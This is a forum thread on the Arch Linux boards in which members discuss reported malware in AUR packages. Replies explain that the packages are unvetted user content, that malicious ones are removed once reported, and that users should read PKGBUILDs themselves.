You are not logged in.
- Topics: Active | Unanswered
#1 2025-08-07 01:40:08
- millus
- Member
- Registered: 2019-07-21
- Posts: 235
Any team notes about malware incidents?
I just read in some tech news that AUR had repeatedly inserted some malware.
Is there some official posting here that has info/guidelines for users about AUR usage and the situation? I searched forum for "malware" but didn't find anything, so the only info I got so far was from random tech news sites 
Offline
#2 2025-08-07 04:48:14
- mpan
- Member
- Registered: 2012-08-01
- Posts: 1,526
- Website
Re: Any team notes about malware incidents?
Yes, the Arch User Repository article in the wiki.
AUR packages are user-produced content. These PKGBUILDs are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.
Last edited by mpan (2025-08-07 04:48:59)
Paperclips in avatars? | Sometimes I seem a bit harsh — don’t get offended too easily!
Offline
#3 2025-08-07 11:01:15
- millus
- Member
- Registered: 2019-07-21
- Posts: 235
Re: Any team notes about malware incidents?
That page doesn't say anything about the current situation and which packages are or were affected or whether there is any kind of scanning/checking going on or whatever really.
Offline
#4 2025-08-07 11:35:31
- close2zero
- Member
- From: Norway
- Registered: 2025-07-14
- Posts: 65
Re: Any team notes about malware incidents?
I second mpan post regarding your question. It says that you use it at your own risk. Isn't that all the information you need? And by the way: Arch Linux is not a corporation, but a community of volunteers. If you want that list why don't you do the work yourself? Who is stopping you? Just a suggestion.
[Edit] Typo.
[Edit] Sat the correct name i referred to, as pointed out by seth.
Last edited by close2zero (2025-08-07 14:49:27)
while true; do mount /dev/close2zero /mnt/clarity; done
Offline
#5 2025-08-07 12:05:26
- Lone_Wolf
- Administrator
- From: Netherlands, Europe
- Registered: 2005-10-04
- Posts: 14,485
Re: Any team notes about malware incidents?
Subscribe to aur-general ML or check its aur general ML archives frequently.
whether there is any kind of scanning/checking going on
Nothing automated, all scanning/checking relies on aur users doing it and reporting their findings .
Disliking systemd intensely, but not satisfied with alternatives so focusing on taming systemd.
clean chroot building not flexible enough ?
Try clean chroot manager by graysky
Offline
#6 2025-08-07 13:54:18
- seth
- Member
- From: Don't DM me only for attention
- Registered: 2012-09-03
- Posts: 71,002
Re: Any team notes about malware incidents?
@close2zero, millus is the OP…
@millus
That page doesn't say anything about the current situation and which packages are or were affected
isn't the same question as
Is there some official posting here that has info/guidelines for users about AUR usage and the situation?
Given the frequency with which we're referring to the news page/feed, channeling this through phoronix etc (and providing them clicks…) is probably the most effective way to communicate such incidents 
But in general you'll have to operate on the assumption that this happens all the time. And it will get worse the more popular Arch and derivatives are.
The AUR is a somewhat maintained infrastructure to allow arch users to share PKGBUILDs
It still very much *is* "random stuff I found on the internet" and you have to treat it like this. Always.
Being particularly convenient to find doesn't change that at all.
Think of it as Schrödinger's software - benign and malicious until you read the PKGBUILD.
It is the major concern and complaint about pacman wrapping AUR helpers that they blend repos and AUR which allows this kind of attack to promise any success.
Offline
#7 2025-08-07 14:35:10
- cryptearth
- Member
- Registered: 2024-02-03
- Posts: 1,828
Re: Any team notes about malware incidents?
I guess you refer to https://www.golem.de/news/forscher-warn … 98822.html and the recent withdraw of the duckstation dev
well - Linux uses package managers for a very long time - on windows we're used to download random executeables from the internet - which is worse? none - it's both users responsibility - no more active news needed
Offline
#8 2025-08-07 14:42:26
- seth
- Member
- From: Don't DM me only for attention
- Registered: 2012-09-03
- Posts: 71,002
Re: Any team notes about malware incidents?
Me? Or the OP?
https://linuxnews.de/schon-wieder-malwa … rch-linux/
Offline
#9 2025-08-07 15:05:05
- mpan
- Member
- Registered: 2012-08-01
- Posts: 1,526
- Website
Re: Any team notes about malware incidents?
That page doesn't say anything about the current situation and which packages are or were affected or whether there is any kind of scanning/checking going on or whatever really.
I wouldn’t say there is any “current situation.” As in: there is nothing out of order.
Like with any other communication channel, people try to convince AUR users to run software those users may not wish to run. This is a continuous, stable situation. Here is a well documented example from 2018. But most go unnoticed. At best they’re mentioned in ML, because somebody reports their findings this way.
For this reason I don’t really see what kind of official response is expected. The official response is the same as it always is: removal.
Paperclips in avatars? | Sometimes I seem a bit harsh — don’t get offended too easily!
Offline
#10 2025-08-07 15:30:34
- close2zero
- Member
- From: Norway
- Registered: 2025-07-14
- Posts: 65
Re: Any team notes about malware incidents?
Just to clarify my earlier tone: I didn't mean to come off as dismissive, and I see now that the original question may have been more about current visibility and community hygiene than basic AUR usage. Still, I do think it's important to re-emphasize what both mpan and seth touched on: there's no "new" situation. The nature of the AUR hasn't changed – it has always been a place where trust must be earned, not assumed. The illusion of safety just because a helper wraps it in a convenient interface is exactly what increases risk. It’s also why official "incident reports" don’t really fit the model. As soon as a package is confirmed malicious, it’s removed. The rest is up to users staying informed, reading PKGBUILDs, checking install scripts, and maybe even auditing binaries if necessary.
If this thread helps more people understand that, the better it is for us all.
while true; do mount /dev/close2zero /mnt/clarity; done
Offline
#11 2025-08-07 20:24:44
- mpan
- Member
- Registered: 2012-08-01
- Posts: 1,526
- Website
Re: Any team notes about malware incidents?
To clarify my own tone too, also to not sound as if I’m ignoring millus’ worries: I suspect OP has been misled by news reporting.
Your heart is at the right place and your concerns are reasonable. But from my perspective it is “just another one.” A repeating event, not showing worrying rise in intensity. Most importantly: something normal and expected for a service offering free exchange of information between random people.
Close2zero is correct regarding AUR helpers. Among those without proper mental model of AUR, helpers contribute to increasing risks.
Paperclips in avatars? | Sometimes I seem a bit harsh — don’t get offended too easily!
Offline
#12 2025-08-07 22:02:57
- millus
- Member
- Registered: 2019-07-21
- Posts: 235
Re: Any team notes about malware incidents?
thanks for uwu anwers, got it. Also, Phoronix is great, will continue checking.
Offline